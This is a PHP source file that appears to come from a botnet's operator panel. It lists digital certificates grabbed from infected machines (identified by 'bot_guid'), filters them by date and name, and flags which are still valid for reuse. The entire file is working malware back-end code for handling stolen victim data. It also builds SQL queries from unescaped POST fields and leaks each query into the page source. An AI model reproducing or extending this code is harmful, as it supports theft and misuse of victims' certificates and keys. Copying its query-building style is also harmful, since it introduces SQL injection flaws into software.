<?

$root_path = './';
require($root_path.'common.php');

if (!auth_check())
{
	die('<b>Please login...</b>');
}


if(!($db_link = mysqli_connect(DB_SERVER, DB_USER, DB_PASSWORD, DB_NAME)))
{
	die('<b>Could not connect to the database...</b>');
}


$bot_guid = $_POST['bot_guid'];
$certdatestart = $_POST['certdatestart'];
$certdateend = $_POST['certdateend'];
$data = $_POST['data'];
$limit = $_POST['limit'];
$showUseless = isset($_POST['showUseless']) ? true : false;

$where_params = array();

if (strlen($certdatestart) && strlen($certdateend))
{
	list($day, $month, $year) = preg_split('#[ :\/.-]#', $certdatestart);
	$tstamp0 = "$year-$month-$day 00:00:00";
	
	list($day, $month, $year) = preg_split('#[ :\/.-]#', $certdateend);
	$tstamp1 = gmmktime (0, 0, 0, $month, $day + 1, $year);
	$tstamp1 = gmdate('Y-m-d H:i:s', $tstamp1);
	
	$where_params []= "(UNIX_TIMESTAMP(cert.date_rep) >= UNIX_TIMESTAMP('$tstamp0') AND UNIX_TIMESTAMP(cert.date_rep) < UNIX_TIMESTAMP('$tstamp1'))";
}

if (strlen($bot_guid))
{
	$where_params []= "cert.bot_guid LIKE '%".dbEsc($bot_guid)."%'";
}

if (strlen($data))
{
	if (strpos($data, '*') !== false)
	{
		$data = str_replace('*', '%', $data);
	}
	if ($data{0} != '%')
	{
		$data = '%' . $data;
	}
	if ($data{ strlen($data) - 1 } != '%')
	{
		$data .= '%';
	}
	
	$where_params []= "cert.name LIKE '".dbEsc($data)."'";
}

if ($showUseless != true)
{
	$where_params []= "(UCASE(cert.name) <> UCASE(LEFT(bot_guid, INSTR(bot_guid, '!') - 1))) AND (cert.notbefore <= NOW() AND NOW() <= cert.notafter)";
}

if (strlen($limit))
{
	$limit = " LIMIT ".intval($limit);
}


$where_sql = implode(' AND ', $where_params);
if (!empty($where_sql))
{
	$sql = "SELECT id, bot_guid, name, data, crc32, date_rep, LENGTH(data), notbefore, notafter
			FROM cert
			WHERE"
			. $where_sql
			. $limit;
}
else
{
	$sql = "SELECT id, bot_guid, name, data, crc32, date_rep, LENGTH(data), notbefore, notafter
			FROM cert"
			. $limit;
}

echo "<!--$sql-->";

$result = dbQ($sql, __FILE__, __LINE__);

if (dbNumRows($result) == 0)
{
	dbClose();
	die('<span class="error"><b>Not found</b></span>');	
}


$certs = array();


while (list($id, $bot_guid, $name, $data, $crc32, $date_rep, $ln, $notbefore, $notafter) = dbRow($result))
{
	// ~~~
	//$botpc_user = substr($bot_guid, 0, strpos($bot_guid, '!'));
	//if ( $showUseless != true && strcmp($botpc_user, $name) == 0 )
	//	continue;
	// ~~~
	
	list($year, $month, $day) = preg_split('#[ :\/.-]#', $notbefore);
	$nbefore = gmmktime (0, 0, 0, $month, $day, $year);
	list($year, $month, $day) = preg_split('#[ :\/.-]#', $notafter);
	$nafter = gmmktime (0, 0, 0, $month, $day, $year);
	
	$bgcolor = '#cce7ef';
	$subtext = '';
	$title = '';
	if ($nbefore != $nafter)
	{
		if ((time() > $nbefore && time() < $nafter) || strlen($nafter) == 0)
		{
			$bgcolor = 'rgb(180, 245, 180)';
		}
		else
		{
			$bgcolor = 'rgb(245, 180, 180)';
			$title = 'expired';
		}
		$subtext = "[ $notbefore - $notafter ]";
	}
	
	$certs []= array(
		'title' => $title,
		'bgcolor' => $bgcolor,
		'id' => $id,
		'bot_guid' => $bot_guid,
		'date_rep' => $date_rep,
		
		'subtext' => $subtext,
		'name' => $name,
		'size' => round($ln / 1024, 2)
	);
}


dbClose();


$smarty->assign('certs', $certs);
$smarty->display('cert-grabber_sub.tpl');


?>
